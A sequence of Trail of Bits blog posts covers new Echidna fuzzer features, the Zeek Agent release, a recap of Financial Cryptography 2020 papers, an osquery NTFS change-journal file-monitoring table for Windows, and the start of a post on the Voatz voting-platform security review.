An Echidna for all Seasons

TL;DR: We have improved Echidna with tons of new features and enhancements since it was released—and there’s more to come.

Two years ago, we open-sourced Echidna, our property-based smart contract fuzzer. Echidna is one of the tools we use most in smart contract assessments. According to our records, Echidna was used in about 35% of our smart contract audits during the past two years. These include several high-profile audits such as MakerDAO, 0x, and Balancer. Since the first release of Echidna, we have been adding new features as well as fixing bugs. Here’s a quick look at what we’ve done.

New features

We expanded the capabilities of Echidna with a large set of exciting new features. Some of the most important ones are:

Support for several compilation frameworks using crytic-compile: Integration with crytic-compile allowed Echidna to test complex Truffle projects, and even smart contracts in other languages, such as Vyper, right out of the box. It is completely transparent for the user (if you are an Echidna user, you are already using it!) and it was one of the most important features we implemented in Echidna last year.

Assertion testing: Solidity’s assert can be used as an alternative to explicit Echidna properties, especially if the conditions you’re checking are directly related to the correct use of some complex code deep inside a function. Assertion testing also lets you check for implicit asserts inserted by the compiler, such as out-of-bounds array accesses without an explicit property. Add checkAsserts: true in your Echidna configuration file and it will take care of the rest.

An assertion failure is discovered in Vera’s MakerDAO example

Restrict the functions to call during a fuzzing campaign: Not all functions in a smart contract are created equal. Some of them are not useful during property-based testing and will only slow down the campaign. That’s why Echidna can either blacklist or whitelist functions to call during a fuzzing campaign. Here’s an Echidna configuration that avoids “f1” and “f2” methods during a fuzzing campaign:

filterBlacklist: true # or use false for whitelisting
filterFunctions: ["f1", "f2"]

Save and load the corpus collected during a fuzzing campaign: If coverage support is enabled, Echidna can load and save the complete corpus collected in JSON. If a corpus is available at the beginning of a fuzzing campaign, Echidna will use it immediately. This means that Echidna will not start from scratch, which is particularly useful during CI tests to speed up the verification of complex properties. Add coverage: true and corpusDir: "corpus" to your Echidna configuration and create a “corpus” directory to save the inputs generated by Echidna.

Pretty-printed example of a transaction from a corpus.

Detect transactions with high-gas consumption: Excessive gas usage can be a pain for developers and users of smart contracts. There are few tools available for detecting transactions with large gas consumption, especially if detecting the transaction requires reaching unusual states of the contract via other transactions. Recently Echidna added support to detect this kind of issue. Use estimateGas: true in your Echidna configuration to report high-gas transactions to your console.

Discovery of a transaction consuming a large amount of gas

Extended testing of complex contracts: Echidna also improved the testing of complex contracts with two cool features. First, it allows initializing a fuzzing campaign with arbitrary transactions using Etheno. Second, it can test more than one contract at the same time, calling any public or external function of any tested contract. Use multi-abi: true in your Echidna configuration to test more than one contract at the same time.

Keeping up to date with the latest research

We are following the latest developments in smart contract fuzzing papers to make sure Echidna is up to date. Our researchers compare open-source fuzzers to Echidna, and integrate any new approach that proves to be effective for finding faults or generating more interesting inputs. In fact, from time to time, we test examples presented in research papers to make sure Echidna can solve them very efficiently! We also regularly attend conferences to discuss novel fuzzing techniques, and even financially support new research papers that improve our tools.

Echidna solves the example presented in Harvey’s paper

Looking forward

And we’re not taking a break! In fact, we have a pipeline of improvements and new features coming to Echidna in the near future, including enhanced coverage feedback, array generation and corpus mutations, and Slither integration. We are also excited to share that we have added Echidna support to crytic.io, our continuous assurance platform for smart contracts.

Echidna integration for automatic assertion checking in crytic.io

In summary

In two years, Echidna has evolved from an experimental tool into an essential resource for fuzzing smart contracts and identifying correctness/security issues. We continue to push the limits of what is possible by fuzzing smart contracts, and keep our open-source tools updated for community use. Learn more about testing your smart contracts with Echidna in our Building Secure Contracts training.

Do you have smart contracts to test with Echidna? Are you interested in reviewing your Echidna scripts or training on how to use it effectively? Drop us a line! Trail of Bits has years of experience in performing smart contract security assessments, addressing everything from minimalistic tokens to complex staking and voting platforms.

Announcing the Zeek Agent

(This posting is cross-posted between the Zeek blog and the Trail of Bits blog).

The Zeek Network Security Monitor provides a powerful open-source platform for network traffic analysis. However, from its network vantage point, Zeek lacks access to host-level semantics, such as the process and user accounts that are responsible for any connections observed. The new Zeek Agent fills this gap by interfacing Zeek directly with your endpoints, providing semantic context that’s highly valuable for making security decisions. The agent collects endpoint data through custom probes and, optionally, by interfacing to osquery and making most of its tables available to Zeek.

We are releasing the Zeek Agent as open-source code under the liberal BSD license. Head over to the releases page and try it now with your macOS and Linux endpoints; Windows support is coming soon! Please share your ideas, requests and other feedback with us by filing an issue on GitHub or joining the #zeek-agent channel on the new Zeek Slack.

logo

What’s new here and why it’s useful

Traditionally, network security monitors only receive network traffic passively intercepted between hosts (endpoints). While that vantage point is very powerful—the network does not lie!—it does not provide the complete picture, and it can be challenging to understand the broader context of who is doing what on the endpoints. This approach makes analyzing encrypted traffic particularly challenging: Since passive monitoring cannot assess the actual content of the communication, defenders often remain in the dark about its legitimacy.

The Zeek Agent closes this gap by adding an endpoint-level vantage point to host activity. Just like Zeek itself, the policy-neutral agent does not perform any detection. Instead, it collects a stream of host-side events (“new process,” “socket opened,” “user logged in”) and feeds those events into Zeek’s standard processing pipeline, where they become available to Zeek scripts just like traditional network-derived events. By representing both network and host activity inside the same event abstraction, this setup lets users deploy all of Zeek’s powerful machinery to cross-correlate the two vantage points. For example, Zeek could now tag network connections with the endpoint-side services that initiated them (e.g., sshd). The agent can also let Zeek create new logs that record endpoint information, as seen in this example:

Screen Shot 2020-03-20 at 12.29.04 AM

Zeek logs of network connections and listening ports, enriched with relevant process context from the endpoint (provided by the Zeek Agent)

A short history and background of the project

In 2018 at the University of Hamburg, Steffen Haas developed an initial prototype of the agent. Originally called zeek-osquery, this prototype was a powerful demonstration of the agent approach, but it had certain technical limitations that precluded production usage.

In 2019, Corelight hired Trail of Bits to update and improve Haas’ zeek-osquery software prototype. While the prototype was developed as a set of patches that implemented functionality directly within the osquery core, Trail of Bits suggested a different approach that would be more suitable for long-term development, and a better match for existing deployments. The new version began as a port of the existing code to an osquery extension which could be packaged and distributed independently. Eventually, this process evolved into a clean rewrite to produce an entirely new agent that can operate both in a standalone fashion and with osquery. The agent’s built-in data sources leverage the same underlying process-monitoring capabilities as osquery, but in a way more compatible with how Linux systems are configured for real-world use. Trail of Bits also designed the agent to easily support more custom data sources in the future.

How the Zeek Agent works

Like osquery, the agent provides system information in the form of a database, using the SQLite library. Table plugins publish the actual data, and are allocated and registered during startup. Once they export the necessary methods to report the schema and generate data, the internal framework will create the required SQLite table abstractions and attach them to the database.

Most data sources will inspect the system at query time and report their findings at that specific point in time. However, some tables may want to keep listening for system activity even when no query is being executed. This is commonly referred to as an evented table, which typically uses threads/callbacks to continuously record system events in the background. The process_events table works exactly like this, and allows Zeek scripts to look at past process executions.

Additional data sources can be imported from osquery, if it happens to be installed and running on the same system, thanks to the extensions socket. With this design, everything appears to come from a single unified database, allowing users to seamlessly join built-in and osquery tables together.

The tables can be accessed via scripts as soon as the agent connects to a Zeek server instance. Data can be requested either by running a single-shot SQL statement or as a scheduled query that runs automatically and reports data at specified intervals.

On the Zeek side, scripts fully control the data requested from the agent by defining corresponding SQL queries. Results stream into Zeek continuously, and transparently turn into standard Zeek events that handlers can hook into, just as if the events were derived from network traffic.

How to get started

The Zeek Agent documentation summarizes how to build and install the agent. On the Zeek side, there’s a new Zeek Agent framework you can install through Zeek’s package manager. See its documentation for more information on installation and usage. For an example of a Zeek script requesting information from the agent, see this script that turns process activity into a Zeek log on Linux.

What’s next for the Zeek Agent?

Right now, we welcome feedback on the Zeek Agent regarding usability, functionality, and deployment models. We’re curious to see what use-cases the Zeek community comes up with, and we encourage users to publish Zeek packages that leverage the agent’s capabilities. The best places to leave feedback are the agent’s GitHub issues, the #zeek-agent channel on the new Zeek Slack, and the Zeek mailing list.

The agent is an open-source project, so we also appreciate code contributions; just file GitHub pull requests. If you are interested in sponsoring specific work on the Zeek Agent, please contact Corelight.

We continue to extend the agent: We just completed an initial port to macOS, and we’re working on Windows support, as well. We will be extending the Zeek-side agent script framework, and we‘re also adding a multi-hop routing layer to Zeek’s underlying communication system, Broker, to facilitate deployment of the Zeek Agent across numerous endpoints.

About Trail of Bits Security Engineering Services

As your secure development partner, Trail of Bits has helped some of the world’s leading security software companies bring reliable products to market. Our engineering team’s goal is to write secure code and build tools that users can trust to protect their organizations and data. With our teams’ combined software development experience and research into system-level security, we regularly identify foundational gaps: missing capabilities, opportunities for improvement, and even potential vulnerabilities. We will review existing software architecture and provide recommendations or fixes, enhance feature sets or write new capabilities, and improve your security testing using the best available tools.

If your organization has security software plans but lacks the time or dedicated engineering resources to ensure the final product adheres to the best practices in secure coding, contact us. We would love to hear from you.

About Corelight

Corelight delivers powerful network traffic analysis (NTA) solutions that help organizations defend themselves more effectively by transforming network traffic into rich logs, extracted files, and security insights. Corelight Sensors are built on Zeek (formerly called “Bro”), the open-source network security monitoring framework that generates actionable, real-time data for thousands of security teams worldwide. Zeek has become the “gold standard’’ for incident response, threat hunting, and forensics in large enterprises and government agencies worldwide. Founded by the team behind Zeek, Corelight makes a family of virtual and physical network sensors that take the pain out of deploying open-source Zeek and expand its performance and capabilities. Corelight is based in San Francisco, California, and its global customers include Fortune 500 companies, large government agencies, and major research universities. For more information, visit https://www.corelight.com.

Financial Cryptography 2020 Recap

A few weeks ago, we went to the 24th Financial Cryptography (FC) conference and the Workshop on Trusted Smart Contracts (WTSC), where we presented our work on smart contract bug categorization (see our executive summary) and a poster on Echidna. Although FC is not a blockchain conference, it featured several blockchain-oriented presentations this year and in previous years. And despite issues stemming from world-traveling restrictions, the organizers pulled off an excellent conference for 2020.

Here are some of the conference papers we recommend checking out:

Security

Security Analysis on dBFT Protocol of NEO

Qin Wang, Jiangshan Yu, Zhiniang Peng, Van Cuong Bui, Shiping Chen, Yong Ding, and Yang Xiang

In this review of the NEO blockchain’s consensus protocol, dBFT (a variant of the standard PBFT), the authors discovered two successful safety attacks which occurred mostly because dBFT skipped a specific message (COMMIT) for optimization reasons. We’ve reviewed similar consensus protocols at Trail of Bits, and we enjoyed learning about the attacks found here.

Breaking the Encryption Scheme of the Moscow Internet Voting System

Pierrick Gaudry and Alexander Golovnev

We’ve reviewed several on-chain election systems, so this system’s vulnerabilities were no surprise to us. In this study, the encryption of an on-chain voting system in a recent Moscow election used a variant of ElGamal called 3 ElGamal, which is a multi-level encryption version of ElGamal. It is not clear why the developers created this variant, since it does not increase security. They used 256-bit keys, which (as you might expect) are too small; However, the paper’s authors believe 256-bit keys were used because they match the size of EVM operands and allowed a simple on-chain implementation of the encryption. The issue was reported a few weeks before the election, so the developers rewrote most of the codebase and removed the on-chain encryption just before the election. The authors then found another issue that caused a leak of one bit of information—enough to identify a voter’s choice of candidate. Not surprisingly, this paper had significant press coverage (Coindesk, ZDnet, etc.).

LockDown: Balance Availability Attack Against Lightning Network Channels

Cristina Pérez-Solà, Alejandro Ranchal-Pedrosa, Jordi Herrera-Joancomartí, Guillermo Navarro-Arribas, and Joaquin Garcia-Alfaro

In this paper, the authors showed that it is possible to trigger a balance lockdown on the bitcoin lightning network. Essentially, an attacker can reach a dominant position over its target in the network such that it becomes the main gateway of the route payment. Interestingly enough, payment channels allow loops in their path, increasing the fee for the attacker.

Selfish Mining Re-examined

Kevin Alarcón Negy, Peter Rizun, and Emin Gün Sirer

At a high level, selfish mining occurs when a miner does not reveal that a block has been mined. Knowing the block has been mined, the selfish miner can work on the next one and thereby gain an edge over the competition. Selfish mining is a known concept in blockchain, but part of the community believes the reasoning is flawed and the attack is not profitable.

This paper introduces a variant in which a miner switches between selfish mining and standard mining, and shows how a miner would profit from such behavior. They looked at the difficulty adjustment algorithms, and found that some blockchains seem more vulnerable than others. Typically, Ethereum’s uncle reward—in which miners receive a small reward if competitive blocks are mined (i.e., when two miners find a different block at the same time)—seems to make Ethereum more vulnerable.

Program analysis

Marlowe: Implementing and Analysing Financial Contracts on Blockchain

Pablo Lamela Seijas, Alexander Nemish, David Smith, and Simon Thompson

Marlowe is a Haskel-based DSL meant to represent financial contracts on the Cardano blockchain. The DSL is not Turing-complete, but aims to provide all the features necessary for the most common financial contracts. It is a nice work in progress; check it out their web-based IDE.

Enforcing Determinism of Java Smart Contracts

Fausto Spoto

This work focuses on the Takamaka blockchain, which allows smart contracts to be written in Java and executed in a Java virtual machine. One of the main issues with Java is keeping deterministic execution, while some standard libraries are not deterministic (e.g., HashSet). This work-in-progress uses a whitelist approach of known deterministic libraries, and statically detects when a function call is dangerous; it then adds dynamic instrumentation and reverts the contract if non-deterministic behavior is detected.

Albert, an Intermediate Smart-Contract Language for the Tezos Blockchain

Bruno Bernardo, Raphaël Cauderlier, Basile Pesin, and Julien Tesson

Albert is an intermediate representation for the Tezos blockchain. Its compiler to Michelson, the language executed on Tezos, was written and verified in Coq. It is nice work in progress, and we were happy to see compiler verification applied to smart contract language.

A Formally Verified Static Analysis Framework for Compositional Contracts

Fritz Henglein, Christian Kjær Larsen, and Agata Murawska

This work presents an abstract interpretation framework based on the Contract Specification Language (CSL). The work is interesting, but unfortunately, CSL has not yet found much real-world usage.

Protocol design

Load Balancing in Sharded Blockchains

Naoya Okanami, Ryuya Nakamura, and Takashi Nishide

This paper focused on the sharding repartition for Eth 2.0. With Eth 2.0, smart contracts will be split between shards, and then one must determine which contract is in what shard. It’s a hot topic, with many different approaches. For example, Eth 2.0 might end with a “Yank” opcode, allowing a contract to switch between shards. This work proposes a load-balancing approach, where off-chain competitors submit different repartitions and earn a reward if their solution is picked.

Fairness and Efficiency in DAG-Based Cryptocurrencies

Georgios Birmpas, Elias Koutsoupias, Philip Lazos, and Francisco J. Marmolejo-Cossío

DAG-based public ledgers are an alternative to blockchain. Instead of storing the history of the chain in a linear data structure, some teams try to use a DAG (directed acyclic graph). DAG-based ledgers are supposed to scale significantly better than blockchain, but they create a difficult architecture to synchronize. This paper proposed a scenario in which there is no malicious miner, and showed that even in this situation, the synchronization is difficult and depends heavily on miner connectivity.

Decentralized Privacy-Preserving Netting Protocol on Blockchain for Payment Systems

Shengjiao Cao, Yuan Yuan, Angelo De Caro, Karthik Nandakumar, Kaoutar Elkhiyaoui, and Yanyan Hu

Done in collaboration with IBM, this work used zk-proof to create a decentralized netting and allow banks to settle their balances. See the code.

MicroCash: Practical Concurrent Processing of Micropayments

Ghada Almashaqbeh, Allison Bishop, and Justin Cappos

In this paper, the authors created a micro-payment solution that handles parallel payments. Most existing micro-payment solutions require sequential payment, which limits their usage. The author extended the existing probabilistic micropayment schema. One limitation is that the system requires a relatively stable set of merchants, but it is likely to match most real-world situations.

Ride the Lightning: The Game Theory of Payment Channels

Zeta Avarikioti, Lioba Heimbach, Yuyi Wang, and Roger Wattenhofer

Here, the authors use a game theory approach for economic modeling of payment channels. They used graph-based metrics (betweenness and closeness centrality) and aimed to minimize the user’s cost (channels’ creation cost) while maximizing fees. It is an interesting approach. Some assumptions are not realistic (e.g., it assumes that all the nodes are static), but their approach shows that there are improvements to be made in the nodes’ strategies for their payment channel position.

How to Profit From Payment Channels

Oğuzhan Ersoy, Stefanie Roos, and Zekeriya Erkin

When the authors looked at the fee chosen by the nodes in a payment channel, most of the nodes seemed to use the default value. This work formalizes the optimization problem of having the optimal fee for a node, and shows that the problem is NP-hard. It then proposes a greedy algorithm to find an approximation to the optimal solution. Here they assume that other nodes keep a fee constant, which is realistic for now, but might change if nodes start using more efficient fee strategies.

High-level studies

Surviving the Cryptojungle: Perception and Management of Risk Among North American Cryptocurrency (Non)Users

Artemij Voskobojnikov, Borke Obada-Obieh, Yue Huang, and Konstantin Beznosov

This is a user study on the perception and management of the risks associated with cryptocurrency. It is an interesting work focusing on cryptocurrency in general, not just bitcoin. As expected, the authors found that many users struggle with the user-interface of wallet and blockchain applications, and several users studied are afraid of using cryptocurrency and are waiting for more regulations.

Characterizing Types of Smart Contracts in the Ethereum Landscape

Monika di Angelo and Gernot Salzer

This study focuses on classifying activity on the Ethereum mainet. It confirms some known results: A lot of code is duplicated and/or unused. The paper also shows that GasTokens are responsible for a significant percentage of transactions. Such a classification is needed to better understand the different trends and usages of blockchain.

Smart Contract Development From the Perspective of Developers: Topics and Issues Discussed on Social Media.

Afiya Ayman, Shanto Roy, Amin Alipour, and Aron Laszka

This paper took an interesting approach to security questions and tool citation by showing which tools are cited most often in Stack Exchange and Medium. It would be interesting to apply this approach to other media (Reddit, Twitter), and look at the software quality of the tools. For example, Oyente is frequently cited, but the tool has not been updated since 2018 and is no longer usable.

Systematization of knowledge

SoK: A Classification Framework for Stablecoin Designs

Amani Moin, Kevin Sekniqi, and Emin Gun Sirer

This work classifies the different stablecoins and will be a useful reference. We were interested in this work since we reviewed many of the stablecoins cited.

SoK: Layer-Two Blockchain Protocols

Lewis Gudgeon, Pedro Moreno-Sanchez, Stefanie Roos, Patrick McCorry, and Arthur Gervai

The paper summarizes different layer-two solutions, and will be a useful reference for anyone working on this topic.

Secure computation

Communication-Efficient (Client-Aided) Secure Two-Party Protocols and Its Application

Satsuya Ohata and Koji Nuida

This paper focused on MPCs based on shared-secret (SS), which are faster than traditional garbled circuits. The main issue with most SS-based MPCs is the number of communication rounds required, which creates significant network latency. This makes MPCs impractical to deploy on a WAN setup, which seems to be an anti-goal for MPC. The authors focus on reducing the number of communication rounds so SS-based MPC can be deployed on WAN.

Insured MPC: Efficient Secure Computation with Financial Penalties

Carsten Baum, Bernardo David, and Rafael Dowsley

In this presentation on the security properties of MPC, the authors explain that traditional works focus mostly on the correctness and privacy of MPC, but some properties are missing. The security of an MPC also relies on fairness (if an adversary gets output, everybody does), identifiable abort (if an adversary aborts, every party knows who caused it), and public verification (any third party can verify that the output was correctly computed). As a result, the authors propose the construction of a publicly verifiable homomorphic commitment scheme with composability guarantees.

Secure Computation of the kth-Ranked Element in a Star Network

Anselme Tueno, Florian Kerschbaum, Stefan Katzenbeisser, Yordan Boev, and Mubashir Qureshi

Here the authors propose a protocol to find the kth-ranked element when multiple parties hold private integers (e.g., comparing employee salaries without revealing the salaries). The main idea is to use a server in a secure multiparty computation (SMC); the server is meant to help the protocol without having access to private information.

Cryptography

Zether: Towards Privacy in a Smart Contract World

Benedikt Bünz, Shashank Agrawal2, Mahdi Zamani2, and Dan Boneh

Zether leverages zk-proofs to allow private fund transfers. It is a hot topic; we previously worked on Aztec, which proposes a similar solution. While the bulletproof library is open-source, the smart contract seems to be closed-source.

BLAZE: Practical Lattice-Based Blind Signatures for Privacy-Preserving Applications

Nabil Alkeilani Alkadri, Rachid El Bansarkhani, and Johannes Buchmann

This paper proposes a post-quantum blind signature schema. Blaze aims to improve two current limitations of the existing schema, i.e., they are either too slow or their signatures are too large.

Submit your research to our Crytic Research Prize!

FC is one of the peer-reviewed conferences recommended in our Crytic $10k cash prize. If you are working on program analysis for smart contracts, try any of our open-source tools (including Slither, Echidna, Manticore) and submit your work for our Crytic prize! We are happy to provide technical support to anyone using our tools for academic research—just contact us.

Real-time file monitoring on Windows with osquery

TL;DR: Trail of Bits has developed ntfs_journal_events, a new event-based osquery table for Windows that enables real-time file change monitoring. You can use this table today to performantly monitor changes to specific files, directories, and entire patterns on your Windows endpoints. Read the schema documentation here!

The results of a query on ntfs_journal_events

File monitoring for fleet security and management purposes

File event monitoring and auditing are vital primitives for endpoint security and management:

  • Many malicious activities are reliably sentineled or forecast by well-known and easy to identify patterns of filesystem activity: rewriting of system libraries, dropping of payloads into fixed locations, and (attempted) removal of defensive programs all indicate potential compromise
  • Non-malicious integrity violations can also be detected through file monitoring: employees jailbreaking their company devices or otherwise circumventing security policies
  • Software deployment, updating, and automated configuration across large fleets: “Does every host have Software X installed and updated to version Y?”
  • Automated troubleshooting and remediation of non-security problems: incorrect permissions on shared files, bad network configurations, disk (over)utilization

A brief survey of file monitoring on Windows

Methods for file monitoring on Windows typically fall into one of three approaches:

We’ll cover the technical details of each of these approaches, as well as their advantages and disadvantages (both general and pertaining to osquery) below.

Win32 APIs

The Windows API provides a collection of (mostly) filesystem-agnostic functions for polling for events on a registered directory:

These routines come with several gotchas:

FindFirstChangeNotification does not monitor the specified directory itself, only its entries. Consequently, the “correct” way to monitor both a directory and its entries is to invoke the function twice: once for the directory itself, and again for its parent (or drive root). This, in turn, requires additional filtering if the only entry of interest in the parent is the directory itself.

These routines provide the filtering and synchronization for retrieving filesystem events, but do not expose the events themselves or their associated metadata. The actual events must be retrieved through ReadDirectoryChangesW, which takes an open handle to the watched directory and many of the same parameters as the polling functions (since it can be used entirely independently of them). Users must also finagle with the bizarre world of OVERLAPPED in order to use ReadDirectoryChangesW safely in an asynchronous context.

ReadDirectoryChangesW can be difficult to use with the Recycling Bin and other pseudo-directory concepts on Windows. This SO post suggests that the final moved name can be resolved with GetFinalPathNameByHandle. This GitHub issue suggests that the function’s behavior is also inconsistent between Windows versions.

Last but not least, ReadDirectoryChangesW uses a fixed-size buffer for each directory handle internally and will flush all change records before they get handled if it cannot keep up with the number of events. In other words, its internal buffer does not function as a ring, and cannot be trusted to degrade gradually or gracefully in the presence of lots of high I/O loads.

An older solution also exists: SHChangeNotifyRegister can be used to register a window as the recipient of file notifications from the shell (i.e., Explorer) via Windows messages. This approach also comes with numerous downsides: it requires the receiving application to maintain a window (even if it’s just a message-only window), uses some weird “item-list” view of filesystem paths, and is capped by the (limited) throughput of Windows message delivery.

All told, the performance and accuracy issues of these APIs make them poor candidates for osquery.

Filter drivers and minifilters

Like so many other engineering challenges in Windows environments, file monitoring has a nuclear option in the form of a kernel-mode APIs. Windows is kind enough to provide two general categories for this purpose: the legacy file system filter API and the more recent minifilter framework. We’ll cover the latter in this post, since it’s what Microsoft recommends.

Minifilters are kernel-mode drivers that directly interpose the I/O operations performed by Windows filesystems. Because they operate at the common filesystem interface layer, minifilters are (mostly) agnostic towards their underlying storage — they can (in theory) interpose any of the filesystem operations known by the NT kernel regardless of filesystem kind or underlying implementation. Minifilters are also composable, meaning that multiple filters can be registered against and interact with a filesystem without conflict.

Minifilters are implemented via the Filter Manager, which establishes a filter loading order based on a configured unique “altitude” (lower altitudes corresponding to earlier loads, and thus earlier access) and presence in a “load order group”, which corresponds to a unique range of altitudes. Load order groups are themselves loaded in ascending order with their members loaded in random order, meaning that having a lower altitude than another minifilter in the same group as you does not guarantee higher precedence. Microsoft provides some documentation for (public) load order groups and altitude ranges here; a list of publicly known altitudes is available here. You can even request one yourself!

While powerful and flexible and generally the right choice for introspecting the filesystem on Windows, minifilters are unsuitable for osquery’s file monitoring purposes:

  • For in-tree (i.e., non-extension) tables, osquery has a policy against system modifications. Installing a minifilter requires us to modify the system by loading a driver, and would require osquery to either ship with a driver or fetch one at install-time.
  • Because minifilters are full kernel-mode drivers, they come with undesirable security and stability risks.
  • The design of osquery makes certain assurances to its users: that it is a single-executable, user-mode agent, self-monitoring its performance overhead at runtime — a kernel-mode driver would violate that design.

Journal monitoring

A third option is available to us: the NTFS journal.

Like most (relatively) modern filesystems, NTFS is journaled: changes to the underlying storage are preceded by updates to a (usually circular) region that records metadata associated with the changes. Dan Luu’s “Files are fraught with peril” contains some good motivating examples of journaling in the form of an “undo log”.

Journaling provides a number of benefits:

  • Increased resilience against corruption: the full chain of userspace-to-kernel-to-hardware operations for an single I/O operation (e.g., unlinking a file) isn’t internally atomic, meaning that a crash can leave the filesystem in an indeterminate or corrupted state. Having journal records for the last pre-committed operations makes it more likely that the filesystem can be rolled back to a known good state.
  • Because the journal provides a reversible record of filesystem actions, interactions with the underlying storage hardware can be made more aggressive: the batch size for triggering a commit can be increased, increasing performance.
  • Since the journal is timely and small (relative to the filesystem), it can be used to avoid costly filesystem queries (e.g., stat) for metadata. This is especially pertinent on Windows, where metadata requests generally involve acquiring a full HANDLE.

NTFS’s journaling mechanism is actually split into two separate components: $LogFile is a write-ahead log that handles journaling for rollback purposes, while the change journal ($Extend\$UsnJrnl) records recent changes on the volume by kind (i.e., without the offset and size information needed for rollback).

Windows uses the latter for its File History feature, and it’s what we’ll use too.

Accessing the change journal

⚠ The samples below have been simplified for brevity’s sake. They don’t contain error handling and bounds checking, both of which are essential for safe and correct use. Read MSDN and/or the full source code in osquery before copying! ⚠

Fortunately for us, opening a handle to and reading from the NTFS change journal for a volume is a relatively painless affair with just a few steps.

  1. We obtain the handle for the volume that we want to monitor via a plain old CreateFile call:ntfs0
  2. We issue a DeviceIoControl[FSCTL_QUERY_USN_JOURNAL] on the handle to get the most recent Update Sequence Number (USN). USNs uniquely identify a batch records committed together; we’ll use our first to “anchor” our queries chronologically:ntfs1
  3. We issue another DeviceIoControl, this time with FSCTL_READ_USN_JOURNAL, to pull a raw buffer of records from the journal. We use a READ_USN_JOURNAL_DATA_V1 to tell the journal to only give us records starting at the USN we got in the last step:ntfs2

Mind the last two fields (2U and 3U) — they’ll be relevant later.

Interpreting the change record buffer

DeviceIoControl[FSCTL_READ_USN_JOURNAL] gives us a raw buffer of variable-length USN_RECORDs, prefixed by a single USN that we can use to issue a future request:

ntfs3

Then, in our process_usn_record:

ntfs4

Recall those last two fields from READ_USN_JOURNAL_DATA_V1 — they correspond to the range of USN_RECORD versions returned to us, inclusive. We explicitly exclude v4 records, since they’re only emitted as part of range tracking and don’t include any additional information we need. You can read more about them on their MSDN page.

MSDN is explicit about these casts being necessary: USN_RECORD is an alias for USN_RECORD_V2, and USN_RECORD_V3 is not guaranteed to have any common layout other than that defined in USN_RECORD_COMMON_HEADER.

Once that’s out of the way, however, the following fields are available in both:

  • Reason: A bitmask of flags indicating changes that have accumulated in the current record. See MSDN’s USN_RECORD_V2 or USN_RECORD_V3 for a list of reason constants.
  • FileReferenceNumber: A unique (usually 128-bit) ordinal referencing the underlying filesystem object. This is the same as the FRN that can be obtained by calling GetFileInformationByHandleEx with FileIdInfo as the information class. FRNs correspond roughly to the “inode” concept in UNIX-land, and have similar semantics (unique per filesystem, not system-wide).
  • ParentFileReferenceNumber: Another FRN, this one for the parent directory (or volume) of the file or directory that this record is for.
  • FileNameLength, FileNameOffset, FileName: The byte-length, offset, and pointer to the filename of the file or directory that this is for. Note that FileName is the base (i.e., unqualified) name — retrieving the fully qualified name requires us to resolve the name of the parent FRN by opening a handle to it (OpenFileById), calling GetFinalPathNameByHandle, and joining the two.

Boom: file events via the change journal. Observe that our approach has sidestepped many of the common performance and overhead problems in file monitoring: we operate completely asynchronously and without blocking the filesystem whatsoever. This alone is a substantial improvement over the minifilter model, which imposes overhead on every I/O operation.

Caveats

Like the other techniques mentioned, the change journal approach to file monitoring is not without its disadvantages.

As the name of the table suggests, change journal monitoring only works on NTFS (and ReFS, which appears to be partially abandoned). It can’t be used to monitor changes on FAT or exFAT volumes, as these lack journaling entirely. It also won’t work on SMB shares, although it will work on cluster-shared volumes of the appropriate underlying format.

Handling of rename operations is also slightly annoying: the change journal records one event for the “old” file being renamed and another for the “new” file being created, meaning that we have to pair the two into a single event for coherent presentation. This isn’t hard (the events reference each other and have distinct masks), but it’s an extra step.

The change journal documentation is also conspicuously absent of information about the possibility of dropped records: the need for a start USN and the returning of a follow-up USN in the raw buffer imply that subsequent queries are expected to succeed, but no official details about the size of wraparound behavior of the change journal are provided. This blog post indicates that the default size is 1MB, which is probably sufficient for most workloads. It’s also changeable via fsutil.

Potentially more important is this line in the MSDN documentation for the Reason bitmask:

The flags that identify reasons for changes that have accumulated in this file or directory journal record since the file or directory opened.
When a file or directory closes, then a final USN record is generated with the USN_REASON_CLOSE flag set. The next change (for example, after the next open operation or deletion) starts a new record with a new set of reason flags.

This implies that duplicate events in the context of an open file’s lifetime can be combined into a single bit in the Reason mask: USN_REASON_DATA_EXTEND can only be set once per record, so an I/O pattern that consists of an open, two writes, and a close will only indicate that some write happened, not which or how many. Consequently, the change journal can’t answer detailed questions about the magnitude of I/O on an open resource; only whether or not some events did occur on it. This is not a major deficiency for the purposes of integrity monitoring, however, as we’re primarily interested in knowing when files change and what their end state is when they do.

Bringing the change journal into osquery

The snippets above give us the foundation for retrieving and interpreting change journal records from a single volume. osquery’s use case is more involved: we’d like to monitor every volume that the user registers interest in, and perform filtering on the retrieved records to limit output to a set of configured patterns.

Every NTFS volume has its own change journal, so each one needs to be opened and monitored independently. osquery’s pub-sub framework is well suited to this task:

  • We define an event publisher (NTFSEventPublisher)
  • In our configuration phase (NTFSEventPublisher::configure()), we read user configuration a la the Linux file_events table:carbon
  • The configuration gives us the base list of volumes to monitor change journals on; we create a USNJournalReader for each and add them as services via Dispatcher::addService()
  • Each reader does its own change journal monitoring and event collection, reporting a list of events back to the publisher
  • We perform some normalization, including reduction of “old” and “new” rename events into singular NTFSEventRecords. We also maintain a cache of parent FRNs to directory names to avoid missing changes caused by directory renames and to minimize the number of open-handle requests we issue
  • The publisher fire()s those normalized events off for consumption by our subscribing table: ntfs_journal_events

Put together, this gives us the event-based table seen in the screenshot above. It’s query time!

carbon (2)

Wrapping things up

The ntfs_journal_events table makes osquery a first-class option for file monitoring on Windows, and further decreases the osquery feature gap between Windows and Linux/macOS (which have had the file_events table for a long time).

Do you have osquery development or deployment needs? Drop us a line! Trail of Bits has been at the center of osquery’s development for years, and has worked on everything from the core to table development to new platform support.

Our Full Report on the Voatz Mobile Voting Platform

Voatz allows voters to cast their ballots from any geographic location on supported mobile devices. Its mobile voting platform is under increasing public scrutiny for security vulnerabilities that could potentially invalidate an election. The issues are serious enough to attract inquiries from the Department of Homeland Security and Congress.

However, there has been no comprehensive security report to provide details of the Voatz vulnerabilities and recommendations for fixing them—until now.

Trail of Bits has performed the first-ever “white-box” security assessment of the platform, with access to the Voatz Core Server and backend software. Our assessment confirmed the issues flagged in previous reports by MIT and others, discovered more, and made recommendations to fix issues and prevent bugs from compromising voting security. Trail of Bits was uniquely qualified for this assessment, employing industry-leading blockchain security, cryptographic, DARPA research, and reverse engineering teams, and having previously assessed other mobile blockchain voting platforms.

Our security review resulted in seventy-nine (79) findings. A third of the findings are high severity, another third medium severity, and the remainder a combination of low, undetermined, and informational severity.

Read our Voatz security report and threat model for full details.

Why Voatz counts

The promises of mobile voting are attractive—better accessibility for differently abled people, streamlined absentee voting, and speed and convenience for all voters. If a mobile platform could guarantee secure voting, it would revolutionize the process. It’s a fantastic goal—but there’s still work to do.

